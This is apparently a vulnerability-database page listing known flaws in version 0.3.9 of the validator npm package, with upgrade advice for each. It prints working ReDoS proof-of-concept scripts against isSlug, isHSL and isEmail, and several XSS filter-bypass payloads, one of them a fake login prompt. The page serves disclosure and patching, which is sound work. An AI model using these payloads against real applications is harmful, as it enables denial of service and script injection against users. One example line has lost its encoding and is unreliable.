validator 0.3.9 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the validator package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Improper Validation of Specified Type of Input validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the `isURL()` function which does not take into account `:` as the delimiter in browsers. An attackers can bypass protocol and domain validation by crafting URLs that exploit the discrepancy in protocol parsing that can lead to Cross-Site Scripting and Open Redirect attacks. How to fix Improper Validation of Specified Type of Input? Upgrade `validator` to version 13.15.20 or higher.	<13.15.20
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isSlug` function PoC `var validator = require("validator") function build_attack(n) { var ret = "111" for (var i = 0; i < n; i++) { ret += "a" } return ret+"_"; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isSlug(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isHSL` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "hsla(0" for (var i = 0; i < n; i++) { ret += " " } return ret+"◎"; } for(var i = 1; i <= 50000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isHSL(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Regular Expression Denial of Service (ReDoS) validator is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `isEmail` function. PoC `var validator = require("validator") function build_attack(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "<" } return ret+""; } for(var i = 1; i <= 50000; i++) { if (i % 10000 == 0) { var time = Date.now(); var attack_str = build_attack(i) validator.isEmail(attack_str,{ allow_display_name: true }) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `validator` to version 13.6.0 or higher.	<13.6.0
M Buffer Overflow `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (`/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==\|[A-Z0-9+\/]{3}=\|[A-Z0-9+\/]{4})$/i`) in order to validate Base64 strings. How to fix Buffer Overflow? Upgrade `validator` to version 5.0.0 or higher.	<5.0.0
H Regular Expression Denial of Service (ReDoS) `validator` is a library of string validators and sanitizers. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs. How to fix Regular Expression Denial of Service (ReDoS)? Update to version 3.22.1 or greater.	>=0.1.0 <3.22.1
M Cross-site Scripting (XSS) validator is a module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). A method of bypassing the filter via an encoded URL has been publicly disclosed. In general, because the function’s filtering is blacklist-based it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package. The xss() function removes the word "javascript" when contained inside an attribute. However, it does not properly handle cases where characters have been hex-encoded. As a result, it is possible to build an input that bypasses the filter but which the browser will accept as valid JavaScript. For example, browsers interpret abc as abc. How to fix Cross-site Scripting (XSS)? Upgrade to the latest version of this library. However, it should be noted that the fix for this vulnerability was to remove the xss filter functionality. Seek another library to provide proper output encoding.	<2.0.0
M Cross-site Scripting (XSS) The validator module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). Several ways to bypass the filter were discovered. In general, because the function’s filtering is blacklist-based it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package. Source: Node Security Project Details Various inputs that could bypass the filter were discovered: Improper parsing of nested tags: `<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>` Incomplete filtering of javascript: URIs: `<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>` UI Redressing: `<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%"> <h1>You have won</h1>Please click the link and enter your login details: <a href="http://example.com/">http://good.com</a> </div>` Bypass via Nested Forbidden Strings: `<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>` Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of. How to fix Cross-site Scripting (XSS)? If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.	<1.1.1

Vulnerability

Vulnerable Version

Improper Validation of Specified Type of Input

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the isURL() function which does not take into account : as the delimiter in browsers. An attackers can bypass protocol and domain validation by crafting URLs that exploit the discrepancy in protocol parsing that can lead to Cross-Site Scripting and Open Redirect attacks.

How to fix Improper Validation of Specified Type of Input?

Upgrade validator to version 13.15.20 or higher.

<13.15.20

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isSlug function

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "111"
    for (var i = 0; i < n; i++) {
        ret += "a"
    }

    return ret+"_";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isSlug(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isHSL function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = "hsla(0"
    for (var i = 0; i < n; i++) {
        ret += " "
    }

    return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isHSL(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail function.

PoC

var validator = require("validator")
function build_attack(n) {
    var ret = ""
    for (var i = 0; i < n; i++) {
        ret += "<"
    }

    return ret+"";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 10000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        validator.isEmail(attack_str,{ allow_display_name: true })
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade validator to version 13.6.0 or higher.

<13.6.0

Buffer Overflow

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Buffer Overflow. It used a regular expression (/^(?:[A-Z0-9+\/]{4})*(?:[A-Z0-9+\/]{2}==|[A-Z0-9+\/]{3}=|[A-Z0-9+\/]{4})$/i) in order to validate Base64 strings.

How to fix Buffer Overflow?

Upgrade validator to version 5.0.0 or higher.

<5.0.0

Regular Expression Denial of Service (ReDoS)

validator is a library of string validators and sanitizers.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression in order to validate URLs.

How to fix Regular Expression Denial of Service (ReDoS)?

Update to version 3.22.1 or greater.

>=0.1.0 <3.22.1

Cross-site Scripting (XSS)

validator is a module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). A method of bypassing the filter via an encoded URL has been publicly disclosed. In general, because the function’s filtering is blacklist-based it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package. The xss() function removes the word "javascript" when contained inside an attribute. However, it does not properly handle cases where characters have been hex-encoded. As a result, it is possible to build an input that bypasses the filter but which the browser will accept as valid JavaScript.

For example, browsers interpret abc as abc.

How to fix Cross-site Scripting (XSS)?

Upgrade to the latest version of this library. However, it should be noted that the fix for this vulnerability was to remove the xss filter functionality. Seek another library to provide proper output encoding.

<2.0.0

Cross-site Scripting (XSS)

The validator module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). Several ways to bypass the filter were discovered. In general, because the function’s filtering is blacklist-based it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package.

Source: Node Security Project

Details

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>

Incomplete filtering of javascript: URIs:

<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>

UI Redressing:

<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>

Bypass via Nested Forbidden Strings:

<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of.

How to fix Cross-site Scripting (XSS)?

If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.

<1.1.1

validator@0.3.9 vulnerabilities

String validation and sanitization

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC

PoC

PoC

Details